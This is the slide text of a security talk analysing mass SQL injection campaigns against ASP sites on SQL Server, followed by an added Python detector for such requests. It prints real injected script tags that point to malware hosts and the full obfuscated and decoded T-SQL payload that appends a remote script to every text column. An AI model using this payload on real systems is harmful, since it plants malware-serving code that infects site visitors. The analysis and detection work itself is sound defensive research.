
Analysis of mass SQL injection attacks

Miroslav Štampar
(dev@sqlmap.org)

FUD (Fear, Uncertainty, Doubt)


- "A new virus is making the rounds and is wreaking havoc on the Internet"
- "Whatever language is used to write to the database, all SQL databases use the same basic formulas for writing and retrieving data"
- "Targets that bottleneck in the technology, making it platform-independent"
- "Whether the machine is using ASP, ColdFusion, JSP, PHP, or whatever else"
- "...blazing through the internet, infecting more than half a million domains around the world to date and as many as 1.5 million URLs"
FSec FOI 2012, Varaždin (Croatia), September 21st, 2012

Google is (not) your friend (1)

Google is (not) your friend (2)

Google is (not) your friend (3)

What's it all about?


- Platform dependent (IIS/ASP(.NET))
- DBMS dependent (Microsoft SQL Server)
- Highly automated (tool-based) approach
- Popular SQL enumeration tools with or without Google search capability don't count (e.g. sqlmap, Havij, Pangolin)
- Infection(s) counting in thousands of domains (not millions as previously believed)
- Dummy as it can be (usually one request per target)
- In short: malware distribution

Modus operandi
- Get hands on a couple of 1-day exploits
- Blindly inject a SQL payload carrying malicious content (<script>, <iframe>, etc.) into the content tables of as many vulnerable web servers as possible
- Leverage the exploit(s) and/or the user's lack of technical knowledge to install malware (spyware, trojans, etc.) on the visitor's computer
- Profit(???) (DEFCON 18, Garry Pejski: My Life As A Spyware Developer)

Sample leveraged exploits


CVE-2012-4681   Oracle Java 7 Update 6
CVE-2012-1889   Microsoft XML Core Services
CVE-2012-1723   Java Runtime Environment
CVE-2012-0507   Java Runtime Environment
CVE-2011-3544   Java Runtime Environment
CVE-2011-2110   Adobe Flash Player
CVE-2011-0611   Adobe Flash Player
CVE-2010-3552   New Java Plug-in
CVE-2010-0188   Adobe Reader
etc.


Notable members (1)


Lilupophilupop (sl.php)
"></title><script src="http://lilupophilupop.com/sl.php"></script><!--

Nikjju (r.php)
<script src=http://nikjju.com/r.php></script>

Robint (u.js)
<script src=http://ww.robint.us/u.js></script>

LizaMoon (ur.php)
</title><script src=http://lizamoon.com/ur.php></script>

Jjghui (urchin.js)
</title><script src=http://jjghui.com/urchin.js></script>


Notable members (2)

Notable members (3)

Generic payload (obfuscated)


GET /vuln.asp?param=1;DECLARE @S VARCHAR(4000);SET @S=CAST(0x4445434C415245204054205641524348415228323535292C40 4320564152434841522832353529204445434C415245205461626C655F43 7572736F7220435552534F5220464F522053454C45435420612E6E616D65 2C622E6E616D652046524F4D207379736F626A6563747320612C73797363 6F6C756D6E73206220574845524520612E69643D622E696420414E442061 2E78747970653D27752720414E442028622E78747970653D3939204F5220 ............................................................ 5845432827555044415445205B272B40542B275D20534554205B272B4043 2B275D3D525452494D28434F4E5645525428564152434841522834303030 292C5B272B40432B275D29292B27273C736372697074207372633D687474 703A2F2F7777772E63686B6164772E636F6D2F622E6A733E3C2F73637269 70743E27272729204645544348204E4558542046524F4D205461626C655F 437572736F7220494E544F2040542C404320454E4420434C4F5345205461 626C655F437572736F72204445414C4C4F43415445205461626C655F4375 72736F7220 AS VARCHAR(4000));EXEC(@S);--


Generic payload (decoded)


DECLARE @t VARCHAR(255), @c VARCHAR(255)
DECLARE table_cursor CURSOR FOR
    SELECT a.name, b.name
    FROM sysobjects a, syscolumns b
    WHERE a.id=b.id AND a.xtype='u'
      AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) /* NTEXT, TEXT, NVARCHAR, VARCHAR */
OPEN table_cursor
FETCH NEXT FROM table_cursor INTO @t,@c
WHILE(@@FETCH_STATUS=0)
BEGIN
    EXEC('UPDATE ['+@t+'] SET ['+@c+']=RTRIM(CONVERT(VARCHAR, ['+@c+']))+''<script src=http://www.attacker.com/malicious.js></script>''')
    FETCH NEXT FROM table_cursor INTO @t,@c
END
CLOSE table_cursor
DEALLOCATE table_cursor

Analysis (1)
- Piggy-backing (stacked) SQL injection
- Obfuscated SQL code (hex encoded)
- Decoded code dynamically executed with the T-SQL EXEC command
- Usage of a cursor for the update
- Iterating over all tables / all text-like columns
- Appending malicious content (e.g. <script src=...>) to all matched column entries using an UPDATE statement
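Triage logic for the pattern just listed, written as an added example that is not part of the talk: it hex-decodes the CAST(0x... AS VARCHAR) blob from a logged request, checks the decoded SQL for the indicators above (stacked EXEC, catalog cursor, dynamic UPDATE) and pulls out the injected script URL. The sample request line and the malicious.example domain are constructed for the example.

```python
import re
from urllib.parse import unquote

CAST_RE = re.compile(r"CAST\(0x([0-9A-Fa-f]+)\s+AS\s+N?VARCHAR", re.I)
SCRIPT_RE = re.compile(r"<script\s+src=['\"]?(https?://[^'\">\s]+)", re.I)
OUTER_EXEC_RE = re.compile(r"\bEXEC\s*\(\s*@\w+\s*\)", re.I)  # stage 1: EXEC of the decoded string
INNER_INDICATORS = {  # stage 2, inside the decoded blob (the points listed on the Analysis slide)
    "cursor": re.compile(r"DECLARE\s+\w+\s+CURSOR\s+FOR", re.I),
    "catalog_walk": re.compile(r"\bsysobjects\b.*\bsyscolumns\b", re.I | re.S),
    "dynamic_update": re.compile(r"EXEC\s*\(\s*'UPDATE\s*\[", re.I),
}

def decode_cast_blob(hexstr):
    """Hex-decode the CAST() argument; VARCHAR blobs are single-byte, NVARCHAR is UTF-16-LE."""
    if len(hexstr) % 2:  # truncated log line: nothing sensible to decode
        return ""
    raw = bytes.fromhex(hexstr)
    try:
        return raw.decode("ascii")
    except UnicodeDecodeError:
        return raw.decode("utf-16-le", errors="replace")

def analyze_request(request_line):
    """Return {'obfuscated', 'indicators', 'script_urls'} for one logged request line."""
    query = unquote(request_line)  # IIS logs keep the query string URL-encoded
    result = {"obfuscated": False, "indicators": [], "script_urls": []}
    match = CAST_RE.search(query)
    if not match:
        return result
    result["obfuscated"] = True
    if OUTER_EXEC_RE.search(query):
        result["indicators"].append("stacked_exec")
    decoded = decode_cast_blob(match.group(1))
    result["indicators"] += [n for n, rx in INNER_INDICATORS.items() if rx.search(decoded)]
    result["script_urls"] = sorted(set(SCRIPT_RE.findall(decoded)))
    return result

# Constructed sample: the decoded slide payload with a placeholder domain, hex-encoded
# and URL-encoded the way the in-the-wild requests arrive.
SAMPLE_SQL = (
    "DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR "
    "SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' "
    "AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor "
    "FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN "
    "EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))"
    "+''<script src=http://malicious.example/b.js></script>''') "
    "FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor"
)
SAMPLE_REQUEST = ("GET /vuln.asp?param=1;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x"
                  + SAMPLE_SQL.encode("ascii").hex().upper() + "%20AS%20VARCHAR(4000));EXEC(@S);--")
```

Running `analyze_request(SAMPLE_REQUEST)` flags all four indicators and returns the injected script URL, which is the value worth feeding into blocklists and cleanup queries.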


Analysis (2)

Analysis (3)

Example (1) - FAIL

Example (2) - FAIL

Example (3) - FAIL

Example (4) - CLUSTER FAIL

Example (5) - SUCCESS

Example (6) - SUCCESS

Asprox (1)
- Spam botnet used for phishing scams (>10K bots)
- Developed over years
- Interesting update: msscntr32.exe (SQL attack tool)
- Google search for targets (e.g. inurl:".asp")
- Launch SQL injection attacks against resulting pages

Asprox (2)

CLI (1)
- Standalone executable
- Rare beast (Chinese underground forums?)
- Google search for targets (e.g. inurl:".asp" inurl:"a=")
- Configurable malicious tag that will be inserted (originally <script src=http://www.2117966.net/fuckjp.js></script>)
- Wild guess is that attackers are being paid for using the tool (call-back to *.cn/pay.asp?SN=...)

CLI (2)

Sample tool (1)

Sample tool (2)

Sample tool (3)

Sample tool (4)

Sample tool (5)

Sample run (1)

Sample run (2)

Sample run (3)

Sample run (5)

Sample run (6)

Sample run (7)

Sample run (8)

Sample run (9)

Questions?
